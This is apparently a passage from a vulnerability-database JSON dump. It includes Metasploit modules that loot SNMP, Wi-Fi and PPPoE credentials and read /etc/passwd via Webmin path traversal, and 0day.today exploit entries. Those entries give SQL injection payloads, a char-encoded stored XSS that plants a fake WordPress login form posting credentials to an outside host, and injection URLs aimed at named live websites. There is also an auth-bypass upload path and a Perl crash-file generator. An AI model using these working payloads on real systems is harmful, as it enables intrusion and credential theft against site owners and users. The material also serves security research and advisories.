print_good(\"#{ip}\")\n print_good(\"SNMP System Name: #{snmp_systemname}\")\n print_good(\"SNMP System Description: #{snmp_systemdescription}\")\n print_good(\"Device UpTime: #{system_uptime}\")\n print_good(\"U-boot version: #{uboot_version} \\n\")\n\n print_status(\"Fetching SNMP Information...\\n\")\n print_good(\"SNMP read-only community name: #{snmp_readonly_community}\")\n print_good(\"SNMP read-write community name: #{snmp_readwrite_community}\")\n print_good(\"SNMP Trap Community: #{snmp_trap_community}\")\n print_good(\"SNMP Trap Server IP Address: #{snmp_trap_entryip} \\n\")\n\n print_status(\"Fetching WIFI Information...\\n\")\n print_good(\"Wireless Interface SSID: #{wireless_interface_ssid}\")\n print_good(\"Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}\")\n print_good(\"Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption} \\n\")\n\n print_status(\"Fetching WIFI Radius Information...\\n\")\n print_good(\"RADIUS server info: #{wireless_radius_serverinfo}\")\n print_good(\"RADIUS server port: #{wireless_radius_serverport}\")\n print_good(\"RADIUS server secret: #{wireless_radius_serversecret}\")\n print_good(\"Wireless Radius Username: #{wireless_radius_username}\")\n print_good(\"Wireless Radius Password: #{wireless_radius_password} \\n\")\n\n print_status(\"Fetching Network PPPoE Information...\\n\")\n print_good(\"Network PPPoE Service Name: #{network_wan_pppoeservice}\")\n print_good(\"Network PPPoE Username: #{network_wan_pppoeusername}\")\n print_good(\"Network PPPoE Password: #{network_wan_pppoepassword} \\n\")\n\n # set request\n backup_oid = '1.3.6.1.4.1.17713.21.6.4.10.0'\n enable_backup = '1'\n varbind = SNMP::VarBind.new(backup_oid, SNMP::OctetString.new(enable_backup))\n snmp.set(varbind)\n backup_location_oid = '1.3.6.1.4.1.17713.21.6.4.13.0'\n backup_location = snmp.get_value(backup_location_oid)\n\n if @backup_location.present? == false\n print_status('Backup needs to triggered manually. Run the following commands:')\n print_status(\" snmpset -c <SNMP-RW-string> -v 1 #{datastore['RHOST']} 1.3.6.1.4.1.17713.21.6.4.10.0 i 1\")\n print_status(\" snmpget -c <SNMP-RW-string> -v 1 #{datastore['RHOST']} 1.3.6.1.4.1.17713.21.6.4.13.0 \\n\")\n else\n print_good(\"Configuration backed-up for direct download at: #{backup_location}\")\n end\n\n # Woot we got loot.\n loot_name = 'snmp_loot'\n loot_type = 'text/plain'\n loot_filename = 'epmp1000_snmp_loot.txt'\n loot_desc = 'Cambium ePMP configuration data'\n p = store_loot(loot_name, loot_type, datastore['RHOST'], epmp_info, loot_filename, loot_desc)\n print_good(\"Cambium ePMP loot saved at #{p}\")\n\n rescue SNMP::RequestTimeout\n print_error(\"#{ip} SNMP request timeout.\")\n rescue Rex::ConnectionError\n print_error(\"#{ip} Connection refused.\")\n rescue SNMP::InvalidIpAddress\n print_error(\"#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.\")\n rescue SNMP::UnsupportedVersion\n print_error(\"#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e}\")\n elog(\"Unknown error: #{e.class} #{e}\")\n elog(\"Call stack:\\n#{e.backtrace.join \"\\n\"}\")\n ensure\n disconnect_snmp\n end\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb"}, {"lastseen": "2019-12-01T17:54:46", "bulletinFamily": "exploit", "description": "A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).\n", "modified": "2017-07-24T13:26:21", "published": "2008-01-06T22:02:01", "id": "MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE", "href": "", "type": "metasploit", "title": "Webmin File Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Webmin File Disclosure',\n 'Description' => %q{\n A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '26772'],\n ['BID', '18744'],\n ['CVE', '2006-3392'],\n ['US-CERT-VU', '999601'],\n ['URL', 'http://secunia.com/advisories/20892/'],\n ],\n 'DisclosureDate' => 'Jun 30 2006',\n 'Actions' =>\n [\n ['Download']\n ],\n 'DefaultAction' => 'Download'\n ))\n\n register_options(\n [\n Opt::RPORT(10000),\n OptString.new('RPATH',\n [\n true,\n \"The file to download\",\n \"/etc/passwd\"\n ]\n ),\n OptString.new('DIR',\n [\n true,\n \"Webmin directory path\",\n \"/unauthenticated\"\n ]\n ),\n ])\n end\n\n def run\n print_status(\"Attempting to retrieve #{datastore['RPATH']}...\")\n\n dir = normalize_uri(datastore['DIR'])\n uri = Rex::Text.uri_encode(dir) + \"/..%01\" * 40 + Rex::Text.uri_encode(datastore['RPATH'])\n\n res = send_request_raw({\n 'uri' => uri,\n }, 10)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n print(res.body)\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/webmin/file_disclosure.rb"}], "zdt": [{"lastseen": "2018-03-03T01:42:01", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-07-20T00:00:00", "published": "2017-07-20T00:00:00", "href": "https://0day.today/exploit/description/28160", "id": "1337DAY-ID-28160", "title": "Joomla JoomRecipe 1.0.4 Component - search_author Parameter SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability\r\n# Date: 20.07.2017\r\n# Exploit Author: Teng\r\n# Vendor Homepage: http://joomboost.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/\r\n# Version: 1.0.4\r\n# Platform: PHP\r\n \r\n1. Description\r\nBlind SQL Injection on Search page, with \"search_author\" parameter (POST)\r\n \r\n2. Proof of concept\r\nsqlmap.py -u \"http://localhost/[PATH]/search/results.html\" -p search_author --data \"searchPerformed=1&task=search&searchword=asd&searchCategories%5B%5D=*&search_cuisine=&searchSeasons=&search_author=1&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=\" --random-agent --dbs\r\n \r\nParameter: search_author (POST)\r\n Type: boolean-based blind\r\n Title: MySQL >= 5.0 boolean-based blind - Parameter replace\r\n Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28160"}, {"lastseen": "2018-01-05T11:10:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-03-01T00:00:00", "published": "2017-03-01T00:00:00", "href": "https://0day.today/exploit/description/27160", "id": "1337DAY-ID-27160", "type": "zdt", "title": "WordPress User Login Log 2.2.1 Plugin - Cross-Site Scripting Vulnerability", "sourceData": "Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html\r\n \r\nAbstract\r\nA stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0011\r\n \r\nTested versions\r\nThis issue was successfully tested on User Login Log WordPress Plugin version 2.2.1.\r\n \r\nFix\r\nThere is currently no fix available.\r\n \r\nIntroduction\r\nThe User Login Log WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\nThis vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. This issue exists in method column_default() that is implemented in the file user-login-log.php.\r\n \r\nfunction column_default($item, $column_name)\r\n{\r\n \r\n[...]\r\n \r\n switch($column_name){\r\n \r\n[...]\r\n \r\n default:\r\n return $item[$column_name];\r\n }\r\n}\r\nProof of concept:\r\n \r\nPOST /wp-login.php HTTP/1.1\r\nHost: <target>\r\nUser-Agent: XSS<script>document.getElementById(/wpwrap/.toString().substring(1, 7)).innerHTML = String.fromCharCode(60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,99,111,108,111,114,115,45,102,114,101,115,104,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,99,111,108,111,114,115,45,102,114,101,115,104,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,108,111,103,105,110,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,108,111,103,105,110,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,32,60,115,116,121,108,101,62,98,111,100,121,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,104,101,97,100,101,114,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,108,111,103,105,110,102,111,114,109,123,116,101,120,116,45,97,108,105,103,110,58,32,108,101,102,116,59,125,112,32,35,110,97,118,123,116,101,120,116,45,115,104,97,100,111,119,58,32,114,103,98,97,40,50,53,53,44,50,53,53,44,50,53,53,44,49,41,32,48,32,49,112,120,32,48,59,125,46,115,117,98,109,105,116,123,112,97,100,100,105,110,103,58,32,48,59,125,35,98,97,99,107,116,111,98,108,111,103,32,97,123,99,111,108,111,114,58,32,35,99,99,99,59,125,60,47,115,116,121,108,101,62,32,60,100,105,118,32,105,100,61,34,108,111,103,105,110,34,62,60,104,49,62,60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,111,114,100,112,114,101,115,115,46,111,114,103,47,34,32,116,105,116,108,101,61,34,80,111,119,101,114,101,100,32,98,121,32,87,111,114,100,80,114,101,115,115,34,62,84,111,116,97,108,108,121,32,76,101,103,105,116,32,76,111,103,105,110,32,70,111,114,109,60,47,97,62,60,47,104,49,62,32,60,102,111,114,109,32,110,97,109,101,61,34,108,111,103,105,110,102,111,114,109,34,32,105,100,61,34,108,111,103,105,110,102,111,114,109,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,115,104,111,97,108,111,97,107,46,109,108,47,99,111,108,108,101,99,116,34,32,109,101,116,104,111,100,61,34,80,79,83,84,34,32,116,97,114,103,101,116,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,112,62,60,108,97,98,101,108,62,85,115,101,114,110,97,109,101,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,116,101,120,116,34,32,110,97,109,101,61,34,117,34,32,105,100,61,34,117,115,101,114,95,108,111,103,105,110,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,49,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,62,60,108,97,98,101,108,62,80,97,115,115,119,111,114,100,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,110,97,109,101,61,34,112,34,32,105,100,61,34,117,115,101,114,95,112,97,115,115,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,50,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,115,116,121,108,101,61,34,99,111,108,111,114,58,114,101,100,34,62,83,101,115,115,105,111,110,32,104,97,115,32,101,120,112,105,114,101,100,44,32,112,108,101,97,115,101,32,108,111,103,32,105,110,60,47,112,62,60,112,32,99,108,97,115,115,61,34,102,111,114,103,101,116,109,101,110,111,116,34,62,60,108,97,98,101,108,62,60,105,110,112,117,116,32,110,97,109,101,61,34,114,101,109,101,109,98,101,114,109,101,34,32,116,121,112,101,61,34,99,104,101,99,107,98,111,120,34,32,105,100,61,34,114,101,109,101,109,98,101,114,109,101,34,32,118,97,108,117,101,61,34,102,111,114,101,118,101,114,34,32,116,97,98,105,110,100,101,120,61,34,57,48,34,47,62,32,82,101,109,101,109,98,101,114,32,77,101,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,99,108,97,115,115,61,34,115,117,98,109,105,116,34,62,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,32,110,97,109,101,61,34,119,112,45,115,117,98,109,105,116,34,32,105,100,61,34,119,112,45,115,117,98,109,105,116,34,32,118,97,108,117,101,61,34,76,111,103,32,73,110,34,32,116,97,98,105,110,100,101,120,61,34,49,48,48,34,47,62,60,47,112,62,60,47,102,111,114,109,62,32,60,112,32,105,100,61,34,110,97,118,34,62,60,97,32,104,114,101,102,61,34,46,46,47,119,112,45,108,111,103,105,110,46,112,104,112,63,97,99,116,105,111,110,61,108,111,115,116,112,97,115,115,119,111,114,100,34,32,116,105,116,108,101,61,34,80,97,115,115,119,111,114,100,32,76,111,115,116,32,97,110,100,32,70,111,117,110,100,34,62,76,111,115,116,32,121,111,117,114,32,112,97,115,115,119,111,114,100,63,60,47,97,62,60,47,112,62,60,47,100,105,118,62,60,105,102,114,97,109,101,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,32,110,97,109,101,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,47,105,102,114,97,109,101,62,32,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,116,114,121,123,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,117,115,101,114,95,108,111,103,105,110,39,41,46,102,111,99,117,115,40,41,59,125,99,97,116,99,104,40,101,41,123,125,60,47,115,99,114,105,112,116,62);document.getElementById(/wpwrap/.toString().substring(1, 7)).id = /login/.toString().substring(1, 5);document.cookie = String.fromCharCode(39,118,105,115,105,116,101,100,61,116,114,117,101,59,112,97,116,104,61,47,59,109,97,120,45,97,103,101,61,39) + 60 * 10;\r\n</script>XSS\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.8\r\nAccept-Encoding: gzip,deflate,lzma,sdch\r\nCookie: wordpress_test_cookie=WP+Cookie+check\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\n \r\nlog=<user name>&pwd=<password>&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27160", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-02T21:08:55", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "1337DAY-ID-17648", "href": "https://0day.today/exploit/description/17648", "type": "zdt", "title": "SRISMS - XSS / SQL Injection Vulnerability", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Official Website: http://www.1337day.com 0\r\n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm NuxbieCyber Member From Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n[ SRISMS - SQL Injection Vulnerability ]\r\n\r\n[x] Author : the_cyber_nuxbie\r\n[x] Home : www.thecybernuxbie.com\r\n[x] E-mail : [email\u00a0protected]\r\n[x] Found : 10 March 2012 @ 08:25 PM.\r\n[x] Tested : Back|Track 5.\r\n[x] Dork : inurl:\"/searchviewdetails.php?id=\"\r\n________________________________________________________________________\r\n************************************************************************\r\n\r\n- Info WebApps:\r\nThis Content WebApps Develop By: http://www.srisms.com/webdesigning.html\r\n\r\n- Exploit Report:\r\nhttp://localhost/WebApps/searchviewdetails.php?id=[SQL Injection]\r\n\r\n- Sample WebApps Vuln SQLi:\r\nhttp://gayatrivivahakendram.com/searchviewdetails.php?id=730' + [SQL Injection]\r\nhttp://agtsangham.com/searchviewdetails.php?id=400' + [SQL Injection]\r\nhttp://kapumarriagelinks.com/searchviewdetails.php?id=280' + [SQL Injection]\r\nhttp://visakhamarriagelines.com/searchviewdetails.php?id=8160' + [SQL Injection]\r\nhttp://kyathimarriages.com/searchviewdetails.php?id=780' + [SQL Injection]\r\nhttp://ssmarriagelinks.com/searchviewdetails.php?id=358' + [SQL Injection]\r\nhttp://srisimhadrimarriagelinks.com/searchviewdetails.php?id=568' + [SQL Injection]\r\n\r\n - Google Dork:\r\n inurl:\"/searchviewdetails.php?id=\"\r\n\r\n - Exploit Concept:\r\n http://lokalisasi/searchviewdetails.php?id=[XSS]\r\n\r\n - Sample Web Persistent XSS Vulnerability:\r\n http://gayatrivivahakendram.com/searchviewdetails.php?id=<marquee><h1>XSSed By Nuxbie</h1><marquee> <:- [XSS]\r\n http://kapumarriagelinks.com/searchviewdetails.php?id=<marquee><font color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]\r\n http://visakhamarriagelines.com/searchviewdetails.php?id=<script>alert(31337);</script> <:- [XSS]\r\n http://kyathimarriages.com/searchviewdetails.php?id=<script>alert(31337);</script> <:- [XSS]\r\n\r\n \r\n0day no more...\r\n\"n0 d0rk f0r k1dd10ts\"\r\n\r\n- Curahan Hati:\r\nI want to school college level...\r\n(the biggest obsession = S1 - TI)\r\nBut I do not have a cost...\r\nHelp Me...!!!\r\n\r\n- Greetz:\r\n*** 1337day Inject0r TEAM ***\r\n...:::' All Member & Staff Inject0r TEAM ':::...\r\n\r\n- Greetz To All Exploiters From Indonesian:\r\n[ Member Of Inj3ct0r & Exploit-DB ]\r\nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,\r\neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,\r\nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, \r\nNTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,\r\nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... \r\n\r\n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\"\r\n\r\nMe @ March, 10 2012, GMT +08:25 Solo Raya, Indonesian.\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17648"}, {"lastseen": "2018-01-08T17:08:56", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-03-30T00:00:00", "published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11521", "href": "https://0day.today/exploit/description/11521", "type": "zdt", "title": "Fa Home (Auth Bypass) Vulnerability", "sourceData": "===================================\r\nFa Home (Auth Bypass) Vulnerability\r\n===================================\r\n\r\n======================================================================================== \r\n| # Title : Fa Home (Auth Bypass) Vulnerability \r\n| # Author : indoushka \r\n| # email : [email\u00a0protected] \r\n| # Home : www.iqs3cur1ty.com \r\n| # Web Site :\r\n| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu) \r\n| # Bug : (Auth Bypass) \r\n====================== Exploit By indoushka =================================\r\n # Exploit :\r\n \r\n 1 - http://localhost/FaHome//admin/ (Admin Panel)\r\n \r\n 2 - http://localhost/FaHome//admin/edit.index.php (Edit index Home)\r\n \r\n 3 - http://localhost/FaHome//admin/image.php (2 Upload Ev!l)\r\n \r\n 4 - http://localhost/FaHome/upload/1.php (2 Find Ev!l)\r\n\r\n\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11521"}, {"lastseen": "2018-04-08T03:44:41", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2010-03-18T00:00:00", "published": "2010-03-18T00:00:00", "id": "1337DAY-ID-11353", "href": "https://0day.today/exploit/description/11353", "type": "zdt", "title": "mplayer <= 4.4.1 NULL pointer dereference exploit poc", "sourceData": "=====================================================\r\nmplayer <= 4.4.1 NULL pointer dereference exploit poc\r\n=====================================================\r\n\r\n# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day\r\n# Date: 17/03/2010\r\n# Author: Pietro Oliva\r\n# Software Link:\r\n# Version: <= 4.4.1\r\n# Tested on: ubuntu 9.10 but should work in windows too\r\n# CVE : \r\n \r\n#Program received signal SIGSEGV, Segmentation fault.\r\n#0x081176d8 in af_calc_filter_multiplier ()\r\n#(gdb) disas af_calc_filter_multiplier\r\n#Dump of assembler code for function af_calc_filter_multiplier:\r\n#0x081176d0 <af_calc_filter_multiplier+0>: push %ebp\r\n#0x081176d1 <af_calc_filter_multiplier+1>: mov %esp,%ebp\r\n#0x081176d3 <af_calc_filter_multiplier+3>: fld1 \r\n#0x081176d5 <af_calc_filter_multiplier+5>: mov 0x8(%ebp),%eax\r\n#0x081176d8 <af_calc_filter_multiplier+8>: mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!! \r\n#0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi\r\n#0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax)\r\n#0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax\r\n#0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax\r\n#0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16>\r\n#0x081176ea <af_calc_filter_multiplier+26>: pop %ebp\r\n#0x081176eb <af_calc_filter_multiplier+27>: ret \r\n#End of assembler dump.\r\n \r\n# REGISTERS:\r\n#eax 0x0 0 ==========> NULL\r\n#ecx 0xfa157a57 -99255721\r\n#edx 0x1fe0 8160\r\n#ebx 0x8509a08 139500040\r\n#esp 0xbfffe2e8 0xbfffe2e8\r\n#ebp 0xbfffe2e8 0xbfffe2e8\r\n#esi 0x7b84000 129515520\r\n#edi 0xf8000 1015808\r\n#eip 0x81176d8 0x81176d8 <af_calc_filter_multiplier+8>\r\n#eflags 0x10216 [ PF AF IF RF ]\r\n#cs 0x73 115\r\n#ss 0x7b 123\r\n#ds 0x7b 123\r\n#es 0x7b 123\r\n#fs 0x0 0\r\n#gs 0x33 51\r\n \r\n \r\n \r\n#!/usr/bin/perl\r\n \r\nprint \"[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\\n\";\r\nprint \"[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\\n\";\r\nprint \"[+] creating crafted file mplayer.wav\\n\";\r\n$buffer=\"\\x52\\x49\\x46\\x46\\x1f\\x04\\x00\\x00\\x57\\x41\\x56\\x45\\x66\\x6d\\x74\\x20\\x10\\x00\\x00\\x00\\x01\\x00\\x1f\";\r\nopen(file,\"> mplayer.wav\");\r\nprint(file $buffer);\r\nprint \"[+] done!\\n\";\r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11353"}, {"lastseen": "2018-02-09T05:16:06", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-08-31T00:00:00", "published": "2008-08-31T00:00:00", "id": "1337DAY-ID-3577", "href": "https://0day.today/exploit/description/3577", "type": "zdt", "title": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability", "sourceData": "==============================================================\r\nWords tag script 1.2 (word) Remote SQL Injection Vulnerability\r\n==============================================================\r\n\r\n\r\n\r\n|___________________________________________________|\r\n|\r\n| Words tag script v1.2 (word) Remote SQL Injection Vulnerability\r\n|\r\n|___________________________________________________\r\n|---------------------Hussin X----------------------|\r\n|\r\n| Author: Hussin X\r\n|\r\n|___________________________________________________\r\n| |\r\n|\r\n| DorK : \"Powered by words tag script\"\r\n|___________________________________________________|\r\n\r\nExploit: \r\n________\r\n\r\n\r\nwww.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--\r\n\r\n\r\n\r\nL!VE DEMO:\r\n_________\r\n\r\n\r\nhttp://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--\r\n\r\n\r\n________________________\r\n\r\ntable_name : column_name\r\n\r\nconfig_variables:variable_name\r\nconfig_variables:value\r\nconfig_variables:id\r\nconfig_variables:title\r\nconfig_variables:text\r\nconfig_variables:description\r\n_______________________\r\n\r\n\r\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3577"}], "openvas": [{"lastseen": "2019-10-24T21:17:19", "bulletinFamily": "scanner", "description": "QuickHeal is prone to a denial-of-service vulnerability.", "modified": "2019-10-23T00:00:00", "published": "2017-05-02T00:00:00", "id": "OPENVAS:1361412562310107160", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107160", "title": "QuickHeal CVE-2015-8285 Denial of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# QuickHeal CVE-2015-8285 Denial of Service Vulnerability\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:quickheal:antivirus_pro\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107160\");\n 